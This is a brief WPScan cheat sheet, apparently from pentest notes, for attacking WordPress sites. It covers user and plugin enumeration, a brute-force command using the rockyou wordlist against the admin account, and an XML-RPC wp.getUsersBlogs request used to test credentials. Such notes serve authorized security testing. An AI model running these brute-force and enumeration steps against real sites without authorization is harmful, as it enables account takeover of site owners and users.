WPScan
Use
wpscan --url https://WEB.comEnumeration
Users & Plugins
wpscan --url https://WEB.com --enumerate u,pBrute Force
wpscan --url https://WEB.com -U admin -P /usr/share/wordlist/rockyou.txtXMLRPC
POST /xmlrpc.php HTTP/1.1
Host: example.com
Content-Length: 235
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>\{\{your username\}\}</value></param>
<param><value>\{\{your password\}\}</value></param>
</params>
</methodCall>Last updated